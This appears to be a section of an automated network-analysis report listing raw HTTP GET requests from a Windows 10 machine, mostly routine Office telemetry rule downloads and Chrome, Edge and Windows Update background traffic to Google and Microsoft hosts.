                      Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCJDKzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCJDKzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pK7CKmhVNkRmn+H&MD=nTznes85 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1730754144&P2=404&P3=2&P4=Xb6YD%2fVIbLoI02xXDPh%2bW27OxURFasr%2b5RGQKb8nZSp%2fdwjD7a%2bdYtg49cx%2fkIIFHrn1TLszaZhgIIgg1mMaCw%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: K/+yqsaimD9BKDXR6ecealSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
